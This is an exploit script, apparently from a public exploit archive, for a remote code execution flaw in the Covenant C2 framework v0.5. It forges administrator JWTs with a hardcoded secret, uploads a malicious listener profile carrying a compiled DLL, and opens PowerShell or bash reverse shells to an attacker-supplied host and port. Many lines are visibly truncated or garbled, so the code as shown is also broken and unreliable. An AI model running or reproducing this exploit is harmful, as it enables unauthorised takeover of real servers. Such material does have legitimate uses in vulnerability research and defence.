Authored by xThaz

Covenant version 0.5 suffers from a remote code execution vulnerability.

# Exploit Title: Covenant v0.5 - Remote Code Execution (RCE)
# Exploit Author: xThaz
# Author website:
# Date: 2022-09-11
# Vendor Homepage:
# Software Link:
# Version: v0.1.3 - v0.5
# Tested on: Windows 11 compiled covenant (Windows defender disabled), Linux covenant docker

# Vulnerability
## Discoverer: coastal
## Date: 2020-07-13
## Discoverer website:
## References:
## -
## -

# !/usr/bin/env python3
# encoding: utf-8

import jwt # pip3 install PyJWT
import json
import warnings
import base64
import re
import random
import argparse

from requests.packages.urllib3.exceptions import InsecureRequestWarning
from Crypto.Hash import HMAC, SHA256 # pip3 install pycryptodome
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from requests import request # pip3 install requests
from subprocess import run
from pwn import remote, context # pip3 install pwntools
from os import remove, urandom
from shutil import which
from urllib.parse import urlparse
from pathlib import Path
from time import time

def check_requirements():
if which("mcs") is None:
print("Please install the mono framework in order to compile the payload.")

def random_hex(length):
alphabet = "0123456789abcdef"
return ''.join(random.choice(alphabet) for _ in range(length))

def request_api(method, token, route, body=""):
warnings.simplefilter('ignore', InsecureRequestWarning)

return request(
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"

def craft_jwt(username, userid=f"{random_hex(8)}-{random_hex(4)}-{random_hex(4)}-{random_hex(4)}-{random_hex(12)}"):
secret_key = '%cYA;YK,lxEFw[&P{2HwZ6Axr,{e&3o_}_P%NX+(q&0Ln^#hhft9gTdm'q%1ugAvfq6rC'

payload_data = {
"sub": username,
"jti": "925f74ca-fc8c-27c6-24be-566b11ab6585",
"": userid,
"": [
"exp": int(time()) + 360,
"iss": "Covenant",
"aud": "Covenant"

token = jwt.encode(payload_data, secret_key, algorithm='HS256')
return token

def get_id_admin(token, json_roles):
id_admin = ""
for role in json_roles:
if role["name"] == "Administrator":
id_admin = role["id"]
print(f"t[*] Found the admin group id : {id_admin}")
print("t[!] Did not found admin group id, quitting !")

id_admin_user = ""
json_users_roles = request_api("get", token, f"users/roles").json()
for user_role in json_users_roles:
if user_role["roleId"] == id_admin:
id_admin_user = user_role["userId"]
print(f"t[*] Found the admin user id : {id_admin_user}")
print("t[!] Did not found admin id, quitting !")

json_users = request_api("get", token, f"users").json()
for user in json_users:
if user["id"] == id_admin_user:
username_admin = user["userName"]
print(f"t[*] Found the admin username : {username_admin}")
return username_admin, id_admin_user
print("t[!] Did not found admin username, quitting !")

def compile_payload():
if args.os == "windows":
payload = '"powershell.exe", "-nop -c "$client = New-Object System.Net.Sockets.TCPClient('' + args.lhost + '',' + args.lport + ');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()""'
payload = '"bash", "-c "exec bash -i &>/dev/tcp/' + args.lhost + '/' + args.lport + ' <&1""'

dll = """using System;
using System.Reflection;

namespace ExampleDLL{
public class Class1{
public Class1(){

public void Main(string[] args){
System.Diagnostics.Process.Start(""" + payload + """);

temp_dll_path = f"/tmp/{random_hex(8)}"
print(f"t[*] Writing payload in {temp_dll_path}.cs")

compilo_path = which("mcs")
compilation = run([compilo_path, temp_dll_path + ".cs", "-t:library"])
if compilation.returncode:
print("t[!] Error when compiling DLL, quitting !")
print(f"t[*] Successfully compiled the DLL in {temp_dll_path}.dll")

dll_encoded = base64.b64encode(Path(f"{temp_dll_path}.dll").read_bytes()).decode()

remove(temp_dll_path + ".cs")
remove(temp_dll_path + ".dll")
print(f"t[*] Removed {temp_dll_path}.cs and {temp_dll_path}.dll")
return dll_encoded

def generate_wrapper(dll_encoded):
wrapper = """public static class MessageTransform {
public static string Transform(byte[] bytes) {
try {
string assemblyBase64 = """" + dll_encoded + """";
var assemblyBytes = System.Convert.FromBase64String(assemblyBase64);
var assembly = System.Reflection.Assembly.Load(assemblyBytes);
foreach (var type in assembly.GetTypes()) {
object instance = System.Activator.CreateInstance(type);
object[] args = new object[] { new string[] { "" } };
try {
type.GetMethod("Main").Invoke(instance, args);
catch {}
catch {}
return System.Convert.ToBase64String(bytes);

public static byte[] Invert(string str) {
return System.Convert.FromBase64String(str);

return wrapper

def upload_profile(token, wrapper):
body = {
'httpUrls': [
'httpRequestHeaders': [
{'name': 'User-Agent',
'value': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 '
{'name': 'Cookie', 'value': 'ASPSESSIONID={GUID}; SESSIONID=1552332971750'}
'httpResponseHeaders': [
{'name': 'Server', 'value': 'Microsoft-IIS/7.5'}
'httpPostRequest': 'i=a19ea23062db990386a3a478cb89d52e&data={DATA}&session=75db-99b1-25fe4e9afbe58696-320bea73',
'httpGetResponse': '{DATA}',
'httpPostResponse': '{DATA}',
'id': 0,
'name': random_hex(8),
'description': '',
'type': 'HTTP',
'messageTransform': wrapper

response = request_api("post", token, "profiles/http", body)

if not response.ok:
print("t[!] Failed to create the listener profile, quitting !")
profile_id = response.json().get('id')
print(f"t[*] Profile created with id {profile_id}")
print("t[*] Successfully created the listener profile")
return profile_id

def generate_valid_listener_port(impersonate_token, tries=0):
if tries >= 10:
print("t[!] Tried 10 times to generate a listener port but failed, quitting !")

port = random.randint(8000, 8250) # TO BE EDITED WITH YOUR TARGET LISTENER PORT
listeners = request_api("get", impersonate_token, "listeners").json()

port_used = []
for listener in listeners:

if port in port_used:
print(f"t[!] Port {port} is already taken by another listener, retrying !")
generate_valid_listener_port(impersonate_token, tries + 1)
print(f"t[*] Port {port} seems free")
return port

def get_id_listener_type(impersonate_token, listener_name):
response = request_api("get", impersonate_token, "listeners/types")
if not response.ok:
print("t[!] Failed to get the listener type, quitting !")
for listener_type in response.json():
if listener_type["name"] == listener_name:
print(f't[*] Found id {listener_type["id"]} for listener {listener_name}')
return listener_type["id"]

def generate_listener(impersonate_token, profile_id):
listener_port = generate_valid_listener_port(impersonate_token)
listener_name = random_hex(8)
data = {
'useSSL': False,
'urls': [
'id': 0,
'name': listener_name,
'bindAddress': "",
'bindPort': listener_port,
'connectAddresses': [
'connectPort': listener_port,
'profileId': profile_id,
'listenerTypeId': get_id_listener_type(impersonate_token, "HTTP"),
'status': 'Active'

response = request_api("post", impersonate_token, "listeners/http", data)

if not response.ok:
print("t[!] Failed to create the listener, quitting !")
print("t[*] Successfully created the listener")
listener_id = response.json().get("id")
return listener_id, listener_port

def create_grunt(impersonate_token, data):
stager_code = request_api("put", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
stager_code = request_api("post", impersonate_token, "launchers/binary", data).json()["stagerCode"]
if stager_code == "":
print("t[!] Failed to create the grunt payload, quitting !")

print("t[*] Successfully created the grunt payload")
return stager_code

def get_grunt_config(impersonate_token, listener_id):
data = {
'id': 0,
'listenerId': listener_id,
'implantTemplateId': 1,
'name': 'Binary',
'description': 'Uses a generated .NET Framework binary to launch a Grunt.',
'type': 'binary',
'dotNetVersion': 'Net35',
'runtimeIdentifier': 'win_x64',
'validateCert': True,
'useCertPinning': True,
'smbPipeName': 'string',
'delay': 0,
'jitterPercent': 0,
'connectAttempts': 0,
'launcherString': 'GruntHTTP.exe',
'outputKind': 'consoleApplication',
'compressStager': False

stager_code = create_grunt(impersonate_token, data)
aes_key ='FromBase64String(@"(.[A-Za-z0-9+/=]{40,50}?)");', stager_code)
guid_prefix ='aGUID = @"(.{10}[0-9a-f]?)";', stager_code)
if not aes_key or not guid_prefix:
print("t[!] Failed to retrieve the grunt configuration, quitting !")

aes_key =
guid_prefix =
print(f"t[*] Found the grunt configuration {[aes_key, guid_prefix]}")
return aes_key, guid_prefix

def aes256_cbc_encrypt(key, message):
iv_bytes = urandom(16)
key_decoded = base64.b64decode(key)
encoded_message = pad(message.encode(), 16)

cipher =, AES.MODE_CBC, iv_bytes)
encrypted = cipher.encrypt(encoded_message)

hmac =, digestmod=SHA256)
signature = hmac.update(encrypted).digest()

return encrypted, iv_bytes, signature

def trigger_exploit(listener_port, aes_key, guid):
message = "<RSAKeyValue><Modulus>tqwoOYfwOkdfax+Er6P3leoKE/w5wWYgmb/riTpSSWCA6T2JklWrPtf9z3s/k0wIi5pX3jWeC5RV5Y/E23jQXPfBB9jW95pIqxwhZ1wC2UOVA8eSCvqbTpqmvTuFPat8ek5piS/QQPSZG98vLsfJ2jQT6XywRZ5JgAZjaqmwUk/lhbUedizVAnYnVqcR4fPEJj2ZVPIzerzIFfGWQrSEbfnjp4F8Y6DjNSTburjFgP0YdXQ9S7qCJ983vM11LfyZiGf97/wFIzXf7pl7CsA8nmQP8t46h8b5hCikXl1waEQLEW+tHRIso+7nBv7ciJ5WgizSAYfXfePlw59xp4UMFQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"

ciphered, iv, signature = aes256_cbc_encrypt(aes_key, message)
data = {
"GUID": guid,
"Type": 0,
"Meta": '',
"IV": base64.b64encode(iv).decode(),
"EncryptedMessage": base64.b64encode(ciphered).decode(),
"HMAC": base64.b64encode(signature).decode()

json_data = json.dumps(data).encode("utf-8")
payload = f"i=a19ea23062db990386a3a478cb89d52e&data={base64.urlsafe_b64encode(json_data).decode()}&session=75db-99b1-25fe4e9afbe58696-320bea73"

if send_exploit(listener_port, "Cookie", guid, payload):
print("t[*] Exploit succeeded, check listener")
else :
print("t[!] Exploit failed, retrying")
if send_exploit(listener_port, "Cookies", guid, payload):
print("t[*] Exploit succeeded, check listener")
print("t[!] Exploit failed, quitting")

def send_exploit(listener_port, header_cookie, guid, payload):
context.log_level = 'error'

request = f"""POST /en-us/test.html HTTP/1.1r
Host: {IP_TARGET}:{listener_port}r
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36r
{header_cookie}: ASPSESSIONID={guid}; SESSIONID=1552332971750r
Content-Type: application/x-www-form-urlencodedr
Content-Length: {len(payload)}r

sock = remote(IP_TARGET, listener_port)
response = sock.recv().decode()

if "HTTP/1.1 200 OK" in response:
return True
return False

if __name__ == "__main__":

parser = argparse.ArgumentParser()
help="URL where the Covenant is hosted, example :")
help="Operating System of the target",
choices=["windows", "linux"])
help="IP of the machine that will receive the reverse shell")
help="Port of the machine that will receive the reverse shell")
args = parser.parse_args()

IP_TARGET = urlparse(

print("[*] Getting the admin info")
sacrificial_token = craft_jwt("xThaz")
roles = request_api("get", sacrificial_token, "roles").json()
admin_username, admin_id = get_id_admin(sacrificial_token, roles)
impersonate_token = craft_jwt(admin_username, admin_id)
print(f"t[*] Impersonated {[admin_username]} with the id {[admin_id]}")

print("[*] Generating payload")
dll_encoded = compile_payload()
wrapper = generate_wrapper(dll_encoded)
print("[*] Uploading malicious listener profile")
profile_id = upload_profile(impersonate_token, wrapper)

print("[*] Generating listener")
listener_id, listener_port = generate_listener(impersonate_token, profile_id)

print("[*] Triggering the exploit")
aes_key, guid_prefix = get_grunt_config(impersonate_token, listener_id)
trigger_exploit(listener_port, aes_key, f"{guid_prefix}{random_hex(10)}")